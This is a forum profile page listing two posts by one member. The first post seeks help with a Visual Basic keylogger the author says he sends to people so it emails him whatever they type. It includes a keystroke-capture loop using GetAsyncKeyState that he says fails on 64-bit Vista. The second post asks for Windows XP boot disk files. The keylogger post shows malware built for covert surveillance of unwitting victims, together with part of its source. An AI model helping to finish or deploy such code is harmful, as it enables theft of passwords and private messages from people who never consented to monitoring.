Jump to content

  •  

  • iBotModz CBox


    cnkilla187

    Member Since 18 May 2009
    Offline Last Active Sep 22 2009 05:33 PM
    -----

    Topics I've Started

    vb 2008 (help)

    16 June 2009 - 02:46 PM

    iv made a key logger that u send to people, and it sends u a email with the stuff they type but it was made form lots of other peoples work that i put togeather from different programs anyway im redoing it completely and i need this code to work:

    Dim result As Integer
    Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
    
    For i = 1 To 255
    result = 0
    result = GetAsyncKeyState(i)
    If result = -32767 Then
    TextBox1.Text = TextBox1.Text + Chr(i)
    End If
    Next i

    but it doesn't work on my vista 64 bit and i dont know how get it to work iv tried changing the user32 to user64 it don't work i think the GetAsyncKeyState Lib should be changed, but to what? if u can help it would be greatly appreciated

    xp boot disk

    21 May 2009 - 06:01 PM

    can someone please give me the iso files for a xp boot disk i want to be able to dual boot xp and vista